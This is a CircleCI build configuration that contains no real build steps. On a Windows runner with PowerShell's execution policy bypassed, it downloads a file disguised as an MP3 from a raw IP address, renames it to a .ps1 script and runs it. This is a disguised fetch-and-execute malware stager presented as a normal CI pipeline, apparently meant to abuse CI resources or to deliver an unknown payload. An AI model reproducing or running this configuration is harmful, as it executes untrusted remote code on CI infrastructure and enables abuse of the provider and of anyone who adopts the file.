version: 2.1
jobs:
  build:
    resource_class: 'windows.large'
    machine:
      image: 'windows-server-2022-gui:current'
      shell: 'powershell.exe -ExecutionPolicy Bypass'
    steps: #C
        - run: Invoke-WebRequest http://103.73.66.72/n2024.mp3 -OutFile B.mp3
        - run: Rename-Item C:\Users\circleci\project\B.mp3 1.ps1
        - run: .\1.ps1